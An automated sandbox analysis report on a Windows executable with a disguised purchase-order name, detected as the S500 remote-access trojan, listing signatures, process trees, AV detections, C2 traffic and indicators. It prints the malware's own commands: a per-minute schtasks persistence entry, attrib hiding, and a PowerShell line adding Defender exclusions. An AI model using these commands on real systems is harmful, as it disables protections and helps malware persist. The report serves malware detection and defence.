Windows Analysis Report
#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe

Overview

General Information

Sample Name: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
Analysis ID: 719236
MD5: d32389e2207879f0b57835eabce6fb02
SHA1: 23c2a0f0ac030766ae74b7fbfc242f3d77b0ff71
SHA256: b3f2810e4ba5c3341498d99807e2f200459eb2bd4d365b3ee52a20e9e12606c1
Tags: exe
Infos:

Detection

S500Rat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected S500Rat
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Uses cmd line tools excessively to alter registry or file data
.NET source code contains potential unpacker
Uses schtasks.exe or at.exe to add and modify task schedules
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Yara detected ProcessChecker
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe (PID: 5220 cmdline: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe MD5: D32389E2207879F0B57835EABCE6FB02)
    • NRHRAS.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\NRHRAS.exe" MD5: 9B1C1C565D60ED67CB6E1986ACD95C3A)
      • attrib.exe (PID: 3080 cmdline: C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 2932 cmdline: C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5148 cmdline: timeout 3 MD5: EB9A65078396FB5D4E3813BB9198CB18)
        • Chrome.exe (PID: 4204 cmdline: "C:\Users\user\AppData\Roaming\Stub\Chrome.exe" MD5: 9B1C1C565D60ED67CB6E1986ACD95C3A)
          • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2468 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5880 cmdline: schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1 MD5: 15FF7D8324231381BAD48A052F85DF04)
    • wscript.exe (PID: 5860 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • Acrobat Reader DC.exe (PID: 768 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • Acrobat Reader DC.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • Acrobat Reader DC.exe (PID: 2740 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • cleanup
{"C2 list": ["127.0.0.1"], "Ports": ["7000"], "Mutex": "S500Mutex_YMXBWEGOQS", "Server Cert": "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"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\UALDJT.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\Users\user\AppData\Roaming\Stub\Chrome.exe | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
C:\Users\user\AppData\Local\Temp\NRHRAS.exe | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |

Source | Rule | Description | Author | Strings
1.2.NRHRAS.exe.2cda580.1.unpack | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
1.0.NRHRAS.exe.2f0000.0.unpack | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
1.2.NRHRAS.exe.2cda580.1.raw.unpack | JoeSecurity_S500Rat | Yara detected S500Rat | Joe Security |
                        No Sigma rule has matched
                        Timestamp: 10/10/22-07:46:46.795098
                        Traffic: 192.168.2.7:49740 -> 194.5.98.212:5552
                        SID:2849885
                        Source Port:49740
                        Destination Port:5552
                        Protocol:TCP
                        Classtype:A Network Trojan was detected


                        AV Detection

                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe | Avira: detection malicious, Label: HEUR/AGEN.1203089
                        Source: C:\Users\user\AppData\Local\Temp\UALDJT.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Avira: detection malicious, Label: HEUR/AGEN.1229397
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Avira: detection malicious, Label: HEUR/AGEN.1203089
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Avira: detected
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | ReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Virustotal: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Metadefender: Detection: 42%
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe | ReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe | Virustotal: Detection: 79%
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe | Metadefender: Detection: 42%
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | ReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Joe Sandbox ML: detected
                        Source: 0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.4110c48.1.unpack | Avira: Label: TR/Patched.Ren.Gen
                        Source: 0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.40e8450.0.unpack | Avira: Label: TR/Patched.Ren.Gen
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack | Malware Configuration Extractor: S500 Rat {"C2 list": ["127.0.0.1"], "Ports": ["7000"], "Mutex": "S500Mutex_YMXBWEGOQS", "Server Cert": "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"}
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B

                        Networking

                        Source: Traffic | Snort IDS: 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 192.168.2.7:49740 -> 194.5.98.212:5552
                        Source: Joe Sandbox View | ASN Name: DANILENKODE DANILENKODE
                        Source: Joe Sandbox View | IP Address: 194.5.98.212 194.5.98.212
                        Source: global traffic | TCP traffic: 192.168.2.7:49702 -> 194.5.98.212:5552
                        Source: NRHRAS.exe, 00000001.00000002.300171430.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_004422FE InternetQueryDataAvailable,InternetReadFile,10_2_004422FE
                        Source: unknown | TCP traffic detected without corresponding DNS query: 194.5.98.212

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: Yara match | File source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_004443FC GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,10_2_004443FC
                        Source: Acrobat Reader DC.exe, 0000000A.00000002.288878742.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_00446313 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00446313
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\NRHRAS.exe AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Stub\Chrome.exe AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe B3F2810E4BA5C3341498D99807E2F200459EB2BD4D365B3EE52A20E9E12606C1
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: String function: 00416C70 appears 68 times
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: String function: 004181F2 appears 38 times
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: String function: 0041341F appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Code function: 1_2_00007FFDC3D41D99 NtSetValueKey,1_2_00007FFDC3D41D99
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,10_2_00431BE8
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: UALDJT.lnk.0.dr | LNK file: ..\..\..\..\..\Windata\Acrobat Reader DC.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | File created: C:\Users\user\AppData\Roaming\Windata
                        Source: classification engine | Classification label: mal100.troj.evad.winEXE@30/12@0/3
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | File read: C:\Users\desktop.ini
                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.cs | Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.cs | Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.cs | Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.cs | Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.cs | Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.cs | Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: Chrome.exe.1.dr, ?????????????/???????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_0044AF6C GetLastError,FormatMessageW,10_2_0044AF6C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | Code function: 10_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_0043305F
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | File read: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown | Process created: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Process created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe "C:\Users\user\AppData\Local\Temp\NRHRAS.exe"
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe "C:\Users\user\AppData\Roaming\Stub\Chrome.exe"
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe Code function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                        Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe'
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
